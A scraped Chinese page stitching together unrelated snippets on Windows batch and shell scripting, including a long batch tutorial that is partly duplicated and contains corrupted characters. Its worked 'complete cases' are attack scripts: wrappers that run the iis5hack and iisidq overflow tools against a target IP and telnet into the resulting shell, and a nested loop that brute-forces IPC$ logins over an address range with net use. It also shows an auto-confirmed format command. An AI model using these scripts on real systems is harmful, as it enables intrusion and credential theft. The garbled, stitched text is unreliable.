windows怎么添加定时任务

仔细看if中的结果，前后比较的值不一样哦！这是因为你set hang=2 &goto 1234这里2后面多了一个空格造成的。

md zhuecho %**%>zhu**.PKzombies

%是变量标志符，也可以叫封闭符，就是告诉系统，两个%符号之间的就是变量。

该喝喝紧急集合

输出一个字符串

a=`echo xxx`通过$a就可以取到echo xxx的返回值

# 定义好要用的变量 REMOTE_SERVER_dev: "gitlab-runner@192.168.1.6:/data/build" # 生成要使用的变量名 CURRENT_REMOTE=$REMOTE_SERVER_$CI_COMMIT_BRANCH # eval 使用变量 eval scp -r ./build "$CURRENT_REMOTE" # 或者可以这样用新变量承接 FRONTEND_SERVER=`eval echo "$""BRANCH_SERVER_IP_$CI_COMMIT_BRANCH"` https://blog.csdn.net/qiphon3650/article/details/121557412

1、首先你需要明白，你要用这个批处理做什么事情。2、根据要做事情，你要知道WINDOWS（DOS下）相应的命令，比如，批处理从C盘复制文件到D盘：格式：COPY[源盘][路径]〈源文件名〉[目标盘][路径][目标文件名]在记事本中写上：copyC:soft*.*D:file然后把记事本后缀.txt改成.bat，复制文件的批处理就好了，相关命令，你可以百度搜一下，按命令格式写就行了下面是我自己写的启动数据库服务的批处理：文件名：开始MSSQL服务.bat内容：netstartMsDtsServernetstartmsftesqlnetstartSQLWriternetstartMSSQL$SQLEXPRESSnetstartMSSQLSERVERnetstartMSSQLServerOLAPServicenetstartReportServer

应该是大写的按ctrl+shift+ESC，调出windows任务管理器窗口，在“进程”中找到“explorer”的进程；

新变量定义为a a=`echo $var`

[root@iZ259r7h4pfZ ~]# echo "${JAVA_HOME}" >> ./test[root@iZ259r7h4pfZ ~]# cat test ${JAVA_HOME}进行转义

执行的文本文件，其扩展名为BAT。 1、 REM REM 是个注释命令一般是用来给程序加上注解的，该命令后的内容在程序执行的时候将不会被显示和执行。例： REM 你现在看到的就是注解，这一句将不会被执行。在以后的例子中解释的内容都REM 会放在REM后面。请大家注意。 2、 ECHO ECHO 是一个回显命令主要参数有OFF和 ON,一般用ECHO message来显示一个特定的消息 。例： Echo off Rem 以上代表关闭回显即不显示所执行的命令 Echo 这个就是消息。 Rem 以上代表显示“这就是消息”这列字符 执行结果： C:>ECHO.BAT 这个就是消息。 3、 GOTO GOTO 即为跳转的意思。在批处理中允许以“：XXX”来构建一个标号然后用GOTO ：标号直接来执行标号后的命令。例 :LABEL REM 上面就是名为LABEL的标号。 DIR C: DIR D: GOTO LABEL REM 以上程序跳转标号LABEL处继续执行。 4、CALL CALL 命令可以在批处理执行过程中调用另一个批处理，当另一个批处理执行完后再继续执行原来的批处理。例： 批处理2.BAT内容如下： ECHO 这就是2的内容 批处理1.BAT内容如下： ECHO 这是1的内容 CALL 2.BAT ECHO 1和2的内容全部显示完成 执行结果如下： C:>1.BAT 这是1的内容 这就是2的内容 1和2的内容全部显示完成 5、PAUSE PAUSE 停止系统命令的执行并显示下面的内容。例： C:> PAUSE 请按任意键继续 . . . 6、 IF IF 条件判断语句，语法格式如下： IF [NOT] ERRORLEVEL number command IF [NOT] string1==string2 command IF [NOT] EXIST filename command 说明： [NOT] 将返回的结果取反值即“如果没有”的意思。 ERRORLEVEL 是命令执行完成后返回的退出值 Number 退出值的数字取值范围0~255。判断时值的排列顺序应该又大到小。返回的值大于或等于指定的值时条件成立。 string1==string2 string1和string2都为字符的数据，英文字符的大小写将看做不同，这个条件中的等于号必须是2个（绝对相等），条件想等后即执行后面的 command EXIST filename 为文件或目录存在的意思。 IF ERRORLEVEL这条语句必须放在某一个命令后面。执行命令后由IF ERRORLEVEL来判断命令的返回值。 例： 1、 IF [NOT] ERRORLEVEL number command 检测命令执行完后的返回值做出判断。 echo off dir z: rem 如果退出代码为1（不成功）就跳至标题1处执行 IF ERRORLEVEL 1 goto 1 rem 如果退出代码为0（成功）就跳至标题0处执行 IF ERRORLEVEL 0 goto 0 :0 echo 命令执行成功！ Rem 程序执行完毕跳至标题exit处退出 goto exit :1 echo 命令执行失败！ Rem 程序执行完毕跳至标题exit处退出 goto exit :exit Rem 这里是程序的出口 2、 IF string1==string2 command 检测当前变量的值做出判断 ECHO OFF IF %1==2 goto no Echo 变量相等！ Goto exit :no echo 变量不相等 goto exit :exit 大家可以这样看效果 C:>test.bat 数字 3、 IF [NOT] EXIST filename command 发现特定的文件做出判断 echo off IF not EXIST autoexec.bat goto 1 echo 文件存在成功！ goto exit :1 echo 文件不存在失败！ goto exit :exit 这个批处理大家可以放在c盘和d盘分别执行看看效果。 7、 FOR FOR这个命令比较特殊是一个循环执行命令的命令，同时FOR的循环里面还可以套用FOR在进行循环。这篇我们介绍基本的用法就不做套用的循环了，后面再来讲解套用的循环。在批处理中FOR的命令如下： FOR [%%c] IN (set) DO [command] [arguments] 在命令行中命令如下： FOR [%c] IN (set) DO [command] [arguments] 常用参数： /L 该集表示以增量形式从开始到结束的一个数字序列。因此，(1,1,5) 将产生序列 1 2 3 4 5，(5,-1,1) 将产生序列 (5 4 3 2 1)。 /D 如果集中包含通配符，则指定与目录名匹配，而不与文件名匹配。 /F 从指定的文件中读取数据作为变量 eol=c - 指一个行注释字符的结尾(就一个) skip=n - 指在文件开始时忽略的行数。 delims=xxx - 指分隔符集。这个替换了空格和跳格键的默认分隔符集。 tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代的 for 本身。这会导致额外变量名称的分配。m-n格式为一个范围。通过 nth 符号指定 mth。如果符号字符串中的最后一个字符星号，那么额外的变量将在最后一个符号解析之后分配并接受行的保留文本。 usebackq - 指定新语法已在下类情况中使用:在作为命令执行一个后引号的字符串并且一个单引号字符为文字字符串命令并允许在 filenameset中使用双引号扩起文件名称。 下面来看一个例子： FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do @echo %i %j %k 会分析 myfile.txt 中的每一行，忽略以分号打头的那些行，将每行中的第二个和第三个符号传递给 for 程序体；用逗号和/或空格定界符号。请注意，这个 for 程序体的语句引用 %i 来取得第二个符号，引用 %j 来取得第三个符号，引用 %k来取得第三个符号后的所有剩余符号。对于带有空格的文件名，您需要用双引号将文件名括起来。为了用这种方式来使用双引号，您还需要使用 usebackq 选项，否则，双引号会被理解成是用作定义某个要分析的字符串的。 %i 专门在 for 语句中得到说明，%j 和 %k 是通过tokens= 选项专门得到说明的。您可以通过 tokens= 一行指定最多 26 个符号，只要不试图说明一个高于字母 "z" 或"Z" 的变量。请记住，FOR 变量名分大小写，是通用的；而且，同时不能有 52 个以上都在使用中。 您还可以在相邻字符串上使用 FOR /F 分析逻辑；方法是，用单引号将括号之间的 filenameset 括起来。这样，该字符串会被当作一个文件中的一个单一输入行。最后，您可以用 FOR /F 命令来分析命令的输出。方法是，将括号之间的 filenameset 变成一个反括字符串。该字符串会被当作命令行，传递到一个子 CMD.EXE，其输出会被抓进内存，并被当作文件分析。因此，以下例子: FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i 会枚举当前环境中的环境变量名称。 以下列举一个简单的例子，他将说明参数/L和没有参数的区别： 删除文件1.TXT 2.TXT 3.TXT 4.TXT 5.TXT 例： ECHO OFF FOR /L %%F IN (1,1,5) DO DEL %%F.TXT 或 FOR %%F IN (1,2,3,4,5) DO DEL %%F.TXT 以上2条命令执行的结果都是一样的如下： C:>DEL 1.TXT C:>DEL 2.TXT C:>DEL 3.TXT C:>DEL 4.TXT C:>DEL 5.TXT 8、 SETLOCAL 开始批处理文件中环境改动的本地化操作。在执行 SETLOCAL 之后 所做的环境改动只限于批处理文件。要还原原先的设置，必须执 行 ENDLOCAL。 达到批处理文件结尾时，对于该批处理文件的每个 尚未执行的 SETLOCAL 命令，都会有一个隐含的 ENDLOCAL 被 执行。例： @ECHO OFF SET PATH /*察看环境变量PATH PAUSE SETLOCAL SET PATH=E:TOOLS /*重新设置环境变量PATH SET PATH PAUSE ENDLOCAL SET PATH 从上例我们可以看到环境变量PATH第1次被显示得时候是系统默认路径。被设置成了E:TOOLS后显示为E:TOOLS但当ENDLOCAL后我们可以看到他又被还原成了系统的默认路径。但这个设置只在该批处理运行的时候有作用。当批处理运行完成后环境变量PATH将会还原。 9、 SHIFT SHIFT命令可以让在命令上的的命令使用超过10个（%0~%9）以上的可替代参数例： ECHO OFF ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9 SHIFT ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9 SHIFT ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9 执行结果如下： C::>SHIFT.BAT 1 2 3 4 5 6 7 8 9 10 11 1 2 3 4 5 6 7 8 9 2 3 4 5 6 7 8 9 10 3 4 5 6 7 8 9 10 11 以上就是基于WIN2000下的9个批处理命令。 第二部分：特殊的符号与批处理 在命令行下有些符号是不允许使用的但有些符号却有着特殊的意义。 1、 符号(@) @在批处理中的意思是关闭当前行的回显。我们从上面知道用命令echo off可以关掉整个批处理的命令回显但却不能不显示echo off这个命令。现在我们在这个命令前加上@这样echo off这一命令就被@关闭了回显从而达到所有命令均不回显得要求 2、 符号(>) >的意思是传递并覆盖。他所起的作用是将运行后的回显结果传递到后面的范围（后面可是文件也可是默认的系统控制台）例： 文件1.txt的文件内容为： 1+1 使用命令c:>dir *.txt >1.txt 这时候1.txt的内容如下 驱动器 C 中的卷没有标签。 卷的序列号是 301A-1508 C: 的目录 2003-03-11 14:04 1,005 FRUNLOG.TXT 2003-04-04 16:38 18,598,494 log.txt 2003-04-04 17:02 5 1.txt 2003-03-12 11:43 0 aierrorlog.txt 2003-03-30 00:35 30,571 202.108.txt 5 个文件 18,630,070 字节 0 个目录 1,191,542,784 可用字节 >将命令执行的结哺橇嗽嫉奈募谌荨? 在传递给控制台的时候程序将不会有任何回显（注意：这里的回显跟echo off关掉的回显不是同一概念。Echo off关掉的是输入命令的回显，这里的回显是程序执行中或后的回显）例： C:>dir *.txt >nul 程序将没有任何显示也不会产生任何痕迹。 3、 符号(>>) 符号>>的作用与符号>相似，但他们的区别在于>>是传递并在文件末尾追加>>也可将回显传递给控制台（用法同上）例： 文件1.txt内同为： 1+1 使用命令c:>dir *.txt >>1.txt 这时候1.txt的内容如下 1+1 驱动器 C 中的卷没有标签。 卷的序列号是 301A-1508 C: 的目录 2003-03-11 14:04 1,005 FRUNLOG.TXT 2003-04-04 16:38 18,598,494 log.txt 2003-04-04 17:02 5 1.txt 2003-03-12 11:43 0 aierrorlog.txt 2003-03-30 00:35 30,571 202.108.txt 5 个文件 18,630,070 字节 0 个目录 1,191,542,784 可用字节 >>将命令执行的结果覆加在了原始的文件内容后面。 4、 符号(|) |是一个管道传输命令意思是将上一命令执行的结果传递给下一命令去处理。例： C:>dir c:|find "1508" 卷的序列号是 301A-1508 以上命令的意思为查找c:的所有并发现1508字符串。Find的用法请用 find /?自行查看 在不使用format的自动格式化参数的时候我是这样来自动格式化盘片的 echo y|fornat a: /s /q /v:system 用过format命令的人都知道format有一个交互对化过程，要使用者输入y来确定当前的命令是否被执行。在这个命令前加上echo y并用管道传输符|将echo执行的结果y传递给format从而达到手工输入y的目的（这条命令有危害性，测试的时候请谨慎） 5、 符号(^) ^ 是对特殊符号 > 、<、 &、的前导字符。在命令中他将以上的3个符号的特殊动能去掉仅仅只吧他们当成符号而不使用他们的特殊意义。例： c:>echo test ^> 1.txt test > 1.txt 从上面可以看出并没有把test写入文件1.txt而是将test >1.txt 当字符串显示了出来。这个符号在远程构建批处理的时候很有效果。 6、 符号(&) &符号允许在一行中使用2个以上不同的命令，当第一个命令执行失败将不影响第2个命令的执行。例： c:> dir z: &dir y: &dir c: 以上的命令将会连续显示z: y: c:盘内的内容不理会该盘符是否存在。 7、 符号(&&) &&符号也是允许在一行中使用2个以上不同的命令，当第一个命令执行失败后后续的命令将不会再被执行。例： c:> dir z: &&dir y: &&dir c: 以上的命令将会提示检查是否存在z:盘如果存在则执行，如果不存在则停止执行所有的后续命令 8、 符号(" ") " "符号允许在字符串中包含空格。进入一个特殊的目录可以用如下方法例: c:>cd “Program Files” c:>cd progra~1 c:>cd pro* 以上方法都可以进入Program Files目录 9、 符号（,） ,符号相当于空格。在某些特殊的情况下可以用,来代替空格使用。例： c:>dir,c: 10、 符号(;) ;符号当命令相同的时候可以将不同的目标用;隔离开来但执行效果不变。如执行过程中发生错误则只返回错误报告但程序还是会继续执行。例： DIR C:;D:;E:F: 以上的命令相当于 DIR C: DIR D: DIR E: DIR F: 当然还有些特殊的符号但他们的使用范围很小我就不再这里一一的说明了。 第三部分：批处理与变量 在批处理中适当的引用变量将会使你所编制的程序应用面更广。批处理每次能处理的变量从%0~%9共10个。其中%0默认给批处理的文件名使用。除非在使用SHIFT命令后%0才能被%1所替代。引用shift命令的例子如果把%1前面多加上一个%0那么结果如下： C::>SHIFT.BAT 1 2 3 4 5 6 7 8 9 10 11 SHIFT.BAT 1 2 3 4 5 6 7 8 9 1 2 3 4 5 6 7 8 9 10 2 3 4 5 6 7 8 9 10 11 系统是如何区分每个变量的呢，系统区分变量的规则为字符串中间的空格，即只要发现空格就把空格前面的字符当作一个变量而空格后面的字符则作为另一个变量。如果你的变量是一个当中包含空格的长目录名这时候你需要用上一节特殊符号8中所用的引号将他圈起来。例： 批处理内容为： ECHO %1 ECHO %2 ECHO %3 输入命令： C:>TEST “Program Files” Program Files Program Files Program Files 在一个复杂的批处理中又可能同时使用的变量会超过10个这时候会和系统的规则想冲突那么这个问题怎么解决呢？在系统中还有一种变量称之为环境变量（使用SET命令可以查看当前系统的环境变量）如当前系统目录是%windir%或%SystemRoot%等。当同时使用的参数超过10个的时候，我们可以把某些在后面的程序中还要调用的变量保存为环境变量。具体用法如 SET A=%1 这样我们就命名了一个新的环境变量A 在调用变量A的时候要%A%这样调用，环境变量不受SHIFT命令影响。如果要改变一个环境变量需要重新对其设置才能改变。当然也可以进行变量与变量之间的传递来达到目的。下面我们来看一个例子，批处理如下： ECHO OFF SET PASS=%1 SHIFT SET PASS1=%1 SHIFT ECHO %PASS% %PASS1% %1 %2 %3 %4 %5 %6 %7 %8 %9 SHIFT ECHO %PASS% %PASS1% %9 SET PASS=%PASS1% 变量的传递 SET PASS1=%9 SHIFT ECHO %PASS% %PASS1% %9 使用命令：C:>TEST A B 3 4 5 6 7 8 9 10 K L A B 3 4 5 6 7 8 9 10 K 注意：这一行显示了11个变量 A B L 在使用了3次SHIFT之后%9变成了L B L 变量的传递后的结果 第四部分：完整案例 以上就是批处理的一些用法。现在我们把这些用法结合起来详细的分析一下目前网上发布的一些批处理，看看他们是怎么运作的。这里我将列举三个例子来详细分析，为了保持程序的完整我的注释会加在/*后面。 例一 这个例子是利用iis5hack.exe对有.printer漏洞的主机进行溢出的批处理。用到的程序有iis5hack.exe和系统自带的telnet.exe。iis5hack的命令格式为： iis5hack <目标ip> <目标端口> <目标版本> <溢出连接端口>目标版本为0-9这10个数字分别对应不同语言版本和sp的系统版本，我们编制的批处理使用的命令格式为 <iis.bat 目标ip （开始版本号）>开始版本号可有可无。程序如下。 @echo off /*关闭命令回显 if "%1%"=="" goto help /*判断%1是否为空，%1为目标ip if "%2%"=="1" goto 1 /*判断%2是否为1，为1则跳转标志1 if "%2%"=="2" goto 2 /*%2为开始版本号，如果没有设置则 if "%2%"=="3" goto 3 /*如果存在则从匹配的地方开始执行 if "%2%"=="4" goto 4 if "%2%"=="5" goto 5 if "%2%"=="6" goto 6 if "%2%"=="7" goto 7 if "%2%"=="8" goto 8 if not EXIST iis5hack.exe goto file /*没有发现iis5hack.exe就执行标志file段内容 ping %1 -n 1 | find "Received = 1" /*ping目标1次，从结果中发现Received = 1 if errorlevel 1 goto error /*如果返回代码为1则执行error段(代码1为没有发现 0为发现并成功执行) iis5hack %1 80 9 88 | find "good" /*开始溢出目标端口80 系统代码9 溢出后连接端口88 在执行结果中发现字符串”good”(溢出成功后才会有字符串good) if not errorlevel 1 goto telnet /*如果没有错误代码1（溢出成功）就执行telnet段的内容。 echo 操作系统类型 9 失败! /否则显示这一句 :8 /*以下代码内容参照上面 iis5hack %1 80 8 88 | find "good" if not errorlevel 1 goto telnet echo 操作系统类型 8 失败! :7 iis5hack %1 80 7 88 | find "good" if not errorlevel 1 goto telnet echo 操作系统类型 7 失败! :6 iis5hack %1 80 6 88 | find "good" if not errorlevel 1 goto telnet echo 操作系统类型 6 失败! :5 iis5hack %1 80 5 88 | find "good" if not errorlevel 1 goto telnet echo 操作系统类型 5 失败! :4 iis5hack %1 80 4 88 | find "good" if not errorlevel 1 goto telnet echo 操作系统类型 4 失败! :3 iis5hack %1 80 3 88 | find "good" if not errorlevel 1 goto telnet echo 操作系统类型 3 失败! :2 iis5hack %1 80 2 88 | find "good" if not errorlevel 1 goto telnet echo 操作系统类型 2 失败! :1 iis5hack %1 80 1 88 | find "good" if not errorlevel 1 goto telnet echo 操作系统类型 1 失败! :0 iis5hack %1 80 0 88 | find "good" if not errorlevel 1 goto telnet echo 操作系统类型 0 失败! goto error :telnet telnet %1 88 /*开始连接目标ip的88端口 goto exit /*连接中断后跳转exit段 :error /*error段显示错误后的帮助信息 echo 可能网络不能连接或者对方以修补该漏洞!请按照下面的格式手工尝试一次! echo iis5hack [目标IP] [WEB端口] [系统类型] [开放端口] ECHO 中文: 0 ECHO 中文+sp1: 1 ECHO 英文: 2 ECHO 英文+sp1: 3 ECHO 日语: 4 ECHO 日语+sp1: 5 ECHO 韩文: 6 ECHO 韩文+sp1: 7 ECHO 墨西哥语: 8 ECHO 墨西哥语+sp1: 9 goto exit /*跳转exit段 :file /*file段显示文件没有发现的信息 echo 文件iis5hack.exe没有发现!程序终止运行! goto exit /*跳转exit段 :help /*help段显示本批处理的使用格式帮助 echo 本程序用法如下: echo iis [目标ip] echo iis [目标ip] [开始的号码9-0] :exit /*exit段为程序出口 这个批处理基本没有什么循环只是一路走下来。所以代码比较长难度不大！ 例二 这个例子是用iisidq.exe对有idq漏洞的机器进行溢出的批处理。使用的程序有iisidq.exe和系统自带的程序telnet.exe。iisidq.exe的用法如下： 运行参数: 操作系统类型 目的地址 web端口 1 溢出监听端口 <输入命令1> 其中,如果输入命令参数没有输入,那么,默认为:"cmd.exe"。 其中操作系统类型类型的代码范围是0-14。我们编制的批处理使用的命令格式为 <idq.bat 目标ip>程序如下： @echo off /*同例一 if not EXIST iisidq.exe goto file /*同例一 if %1 == "" goto error /*同例一 ping %1 -n 1 | find "Received = 1" /*同例一 if errorlevel 1 goto error1 /*同例一 set b=%1 /*创建一个环境变量b,将变量%1的内容传递给环境变量b。变量b的内容以后将是目标ip set a=0 /*创建一个环境变量a并指定环境变量a为0。由于使用整个批处理的循环所以用a来做计数器。 :no /*no段开始 if %a%==0 set d=0 /*如果环境变量a=0则创建环境变量d设定环境变量d=0。 if %a%==1 set d=1 /*环境变量d其实是操作系统类型代码，用计数器来控制其 if %a%==2 set d=2 /*变动。 if %a%==3 set d=3 if %a%==4 set d=4 if %a%==5 set d=5 if %a%==6 set d=6 if %a%==7 set d=7 if %a%==9 set d=9 if %a%==10 set d=13 if %a%==11 set d=14 goto 0 /*变量传递完成后转到标志0处运行 :1 echo 正在执行第%d%项!与目标%b%不能连接!正在尝试连接请等候...... :0 /*标志0开始 IISIDQ %d% %b% 80 1 99 |find "good" /*按格式发送溢出命令并在结果中发现字符串good（发送代码成功才会有字符串good） if errorlevel 1 goto 1 /*如果没有good字符串则没有发送成跳 /*转标志1处继续尝试发送 ping 127.0.0.1 -n 8 >nul /*ping自己8次相当于延时8秒不显示执 /*行结果 echo 正在执行第%d%项! /*报告正在溢出的操作系统类型 telnet %b% 99 /*连接溢出端口 echo. /*显示一个空行 if %d%==14 goto error1 /*如果操作系统类型为14则跳转error1处（循环出口） if %d%==13 set a=11 /*开始用计数器对操作系统代码重新附值 if %d%==9 set a=10 if %d%==7 set a=9 if %d%==6 set a=7 if %d%==5 set a=6 if %d%==4 set a=5 if %d%==3 set a=4 if %d%==2 set a=3 if %d%==1 set a=2 if %d%==0 set a=1 goto no /*附值完成跳转no段执行 :file /*以下都是出错后的帮助提示 echo IIsidq.exe没有发现!将该文件和本文件放在同一目录! goto exit :error echo 错误!目标ip不可识别!请使用下面的格式连接! echo idq [目标IP] goto exit :error1 echo 连接没有成功!可能目标机器已经修补了该漏洞或者网络故障所至! echo 请按照下面的格式手工尝试! echo iisidq [目标类型] [目标IP] [目标端口] [连接方式] [溢出端口] echo telnet [目标ip] [溢出端口] :exit /*整个程序的出口 这个批处理采用的整体循环掌握好计数器部分就掌握了这个批处理。 例三 for /l %%a in (0,1,255) do for /l %%b in (0,1,255) do for /l %%c in (1,1,254) do for /f "tokens=1,2*" %%e in (userpass.txt) do net use \%1.%%a.%%b.%%cipc$ %%e /u:%%f 上面的命令为1条命令。大家可以看出该命令使用了4个FOR来套用的。用法为：C:>TEST.BAT 218

不能在echo的一行上写else，一般这样：IF %X%==%Y% ( ECHO TRUE)ELSE( ECHO FALSE)

当前shell的进程号。你可以使用ps -A 看你自己shell 的pid。是内置变量。$#传递到脚本的参数个数$*以一个单字符串显示所有向脚本传递的参数，与位置变量不同，此选项参数可超过9个$$脚本运行的当前进程ID号$!后台运行的最后一个进程的进程ID号$@与$#相同，但是使用时加引号，并在引号中返回每个参数$-显示shell使用的当前选项，与set命令功能相同$?显示最后命令的退出状态。0表示没有错误，其它任何值表明有错误

尝试作答，只为测试。

DOS命令.bat中加1的表示：set　/a　b=%a%+1

name="Tom"在Linux和Windows等操作系统中，echo命令的基本语法如下：在Linux和Windows等操作系统中，echo命令的基本语法如下：除了输出字符串和变量，echo命令还可以输出特殊字符和控制字符。例如，要输出换行符“ ”，可以使用以下命令：其中，字符串是要输出的文本内容，用引号括起来；变量是指在程序中定义的数据，可以通过echo命令输出其值。

1、 REM REM 是个注释命令一般是用来给程序加上注解的，该命令后的内容在程序执行的时候将不会被显示和执行。例： REM 你现在看到的就是注解，这一句将不会被执行。在以后的例子中解释的内容都REM 会放在REM后面。请大家注意。 2、 ECHO ECHO 是一个回显命令主要参数有OFF和 ON,一般用ECHO message来显示一个特定的消息 。例： Echo off Rem 以上代表关闭回显即不显示所执行的命令 Echo 这个就是消息。 Rem 以上代表显示“这就是消息”这列字符 执行结果： C:>ECHO.BAT 这个就是消息。 3、 GOTO GOTO 即为跳转的意思。在批处理中允许以“：XXX”来构建一个标号然后用GOTO ：标号直接来执行标号后的命令。例 :LABEL REM 上面就是名为LABEL的标号。 DIR C: DIR D: GOTO LABEL REM 以上程序跳转标号LABEL处继续执行。 4、CALL CALL 命令可以在批处理执行过程中调用另一个批处理，当另一个批处理执行完后再继续执行原来的批处理。例： 批处理2.BAT内容如下： ECHO 这就是2的内容 批处理1.BAT内容如下： ECHO 这是1的内容 CALL 2.BAT ECHO 1和2的内容全部显示完成 执行结果如下： C:>1.BAT 这是1的内容 这就是2的内容 1和2的内容全部显示完成 5、PAUSE PAUSE 停止系统命令的执行并显示下面的内容。例： C:> PAUSE 请按任意键继续 . . . 6、 IF IF 条件判断语句，语法格式如下： IF [NOT] ERRORLEVEL number command IF [NOT] string1==string2 command IF [NOT] EXIST filename command 说明： [NOT] 将返回的结果取反值即“如果没有”的意思。 ERRORLEVEL 是命令执行完成后返回的退出值 Number 退出值的数字取值范围0~255。判断时值的排列顺序应该又大到小。返回的值大于或等于指定的值时条件成立。 string1==string2 string1和string2都为字符的数据，英文字符的大小写将看做不同，这个条件中的等于号必须是2个（绝对相等），条件想等后即执行后面的 command EXIST filename 为文件或目录存在的意思。 IF ERRORLEVEL这条语句必须放在某一个命令后面。执行命令后由IF ERRORLEVEL来判断命令的返回值。 例： 1、 IF [NOT] ERRORLEVEL number command 检测命令执行完后的返回值做出判断。 echo off dir z: rem 如果退出代码为1（不成功）就跳至标题1处执行 IF ERRORLEVEL 1 goto 1 rem 如果退出代码为0（成功）就跳至标题0处执行 IF ERRORLEVEL 0 goto 0 :0 echo 命令执行成功！ Rem 程序执行完毕跳至标题exit处退出 goto exit :1 echo 命令执行失败！ Rem 程序执行完毕跳至标题exit处退出 goto exit :exit Rem 这里是程序的出口 2、 IF string1==string2 command 检测当前变量的值做出判断 ECHO OFF IF %1==2 goto no Echo 变量相等！ Goto exit :no echo 变量不相等 goto exit :exit 大家可以这样看效果 C:>test.bat 数字 3、 IF [NOT] EXIST filename command 发现特定的文件做出判断 echo off IF not EXIST autoexec.bat goto 1 echo 文件存在成功！ goto exit :1 echo 文件不存在失败！ goto exit :exit 这个批处理大家可以放在c盘和d盘分别执行看看效果。 7、 FOR FOR这个命令比较特殊是一个循环执行命令的命令，同时FOR的循环里面还可以套用FOR在进行循环。这篇我们介绍基本的用法就不做套用的循环了，后面再来讲解套用的循环。在批处理中FOR的命令如下： FOR [%%c] IN (set) DO [command] [arguments] 在命令行中命令如下： FOR [%c] IN (set) DO [command] [arguments] 常用参数： /L 该集表示以增量形式从开始到结束的一个数字序列。因此，(1,1,5) 将产生序列 1 2 3 4 5，(5,-1,1) 将产生序列 (5 4 3 2 1)。 /D 如果集中包含通配符，则指定与目录名匹配，而不与文件名匹配。 /F 从指定的文件中读取数据作为变量 eol=c - 指一个行注释字符的结尾(就一个) skip=n - 指在文件开始时忽略的行数。 delims=xxx - 指分隔符集。这个替换了空格和跳格键的默认分隔符集。 tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代的 for 本身。这会导致额外变量名称的分配。m-n格式为一个范围。通过 nth 符号指定 mth。如果符号字符串中的最后一个字符星号，那么额外的变量将在最后一个符号解析之后分配并接受行的保留文本。 usebackq - 指定新语法已在下类情况中使用:在作为命令执行一个后引号的字符串并且一个单引号字符为文字字符串命令并允许在 filenameset中使用双引号扩起文件名称。 下面来看一个例子： FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do @echo %i %j %k 会分析 myfile.txt 中的每一行，忽略以分号打头的那些行，将每行中的第二个和第三个符号传递给 for 程序体；用逗号和/或空格定界符号。请注意，这个 for 程序体的语句引用 %i 来取得第二个符号，引用 %j 来取得第三个符号，引用 %k来取得第三个符号后的所有剩余符号。对于带有空格的文件名，您需要用双引号将文件名括起来。为了用这种方式来使用双引号，您还需要使用 usebackq 选项，否则，双引号会被理解成是用作定义某个要分析的字符串的。 %i 专门在 for 语句中得到说明，%j 和 %k 是通过tokens= 选项专门得到说明的。您可以通过 tokens= 一行指定最多 26 个符号，只要不试图说明一个高于字母 "z" 或"Z" 的变量。请记住，FOR 变量名分大小写，是通用的；而且，同时不能有 52 个以上都在使用中。 您还可以在相邻字符串上使用 FOR /F 分析逻辑；方法是，用单引号将括号之间的 filenameset 括起来。这样，该字符串会被当作一个文件中的一个单一输入行。最后，您可以用 FOR /F 命令来分析命令的输出。方法是，将括号之间的 filenameset 变成一个反括字符串。该字符串会被当作命令行，传递到一个子 CMD.EXE，其输出会被抓进内存，并被当作文件分析。因此，以下例子: FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i 会枚举当前环境中的环境变量名称。 以下列举一个简单的例子，他将说明参数/L和没有参数的区别： 删除文件1.TXT 2.TXT 3.TXT 4.TXT 5.TXT 例： ECHO OFF FOR /L %%F IN (1,1,5) DO DEL %%F.TXT 或 FOR %%F IN (1,2,3,4,5) DO DEL %%F.TXT 以上2条命令执行的结果都是一样的如下： C:>DEL 1.TXT C:>DEL 2.TXT C:>DEL 3.TXT C:>DEL 4.TXT C:>DEL 5.TXT 8、 SETLOCAL 开始批处理文件中环境改动的本地化操作。在执行 SETLOCAL 之后 所做的环境改动只限于批处理文件。要还原原先的设置，必须执 行 ENDLOCAL。 达到批处理文件结尾时，对于该批处理文件的每个 尚未执行的 SETLOCAL 命令，都会有一个隐含的 ENDLOCAL 被 执行。例： @ECHO OFF SET PATH /*察看环境变量PATH PAUSE SETLOCAL SET PATH=E:TOOLS /*重新设置环境变量PATH SET PATH PAUSE ENDLOCAL SET PATH 从上例我们可以看到环境变量PATH第1次被显示得时候是系统默认路径。被设置成了E:TOOLS后显示为E:TOOLS但当ENDLOCAL后我们可以看到他又被还原成了系统的默认路径。但这个设置只在该批处理运行的时候有作用。当批处理运行完成后环境变量PATH将会还原。 9、 SHIFT SHIFT命令可以让在命令上的的命令使用超过10个（%0~%9）以上的可替代参数例： ECHO OFF ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9 SHIFT ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9 SHIFT ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9 执行结果如下： C::>SHIFT.BAT 1 2 3 4 5 6 7 8 9 10 11 1 2 3 4 5 6 7 8 9 2 3 4 5 6 7 8 9 10 3 4 5 6 7 8 9 10 11 以上就是基于WIN2000下的9个批处理命令。 第二部分：特殊的符号与批处理 在命令行下有些符号是不允许使用的但有些符号却有着特殊的意义。 1、 符号(@) @在批处理中的意思是关闭当前行的回显。我们从上面知道用命令echo off可以关掉整个批处理的命令回显但却不能不显示echo off这个命令。现在我们在这个命令前加上@这样echo off这一命令就被@关闭了回显从而达到所有命令均不回显得要求 2、 符号(>) >的意思是传递并覆盖。他所起的作用是将运行后的回显结果传递到后面的范围（后面可是文件也可是默认的系统控制台）例： 文件1.txt的文件内容为： 1+1 使用命令c:>dir *.txt >1.txt 这时候1.txt的内容如下 驱动器 C 中的卷没有标签。 卷的序列号是 301A-1508 C: 的目录 2003-03-11 14:04 1,005 FRUNLOG.TXT 2003-04-04 16:38 18,598,494 log.txt 2003-04-04 17:02 5 1.txt 2003-03-12 11:43 0 aierrorlog.txt 2003-03-30 00:35 30,571 202.108.txt 5 个文件 18,630,070 字节 0 个目录 1,191,542,784 可用字节 >将命令执行的结哺橇嗽嫉奈募谌荨? 在传递给控制台的时候程序将不会有任何回显（注意：这里的回显跟echo off关掉的回显不是同一概念。Echo off关掉的是输入命令的回显，这里的回显是程序执行中或后的回显）例： C:>dir *.txt >nul 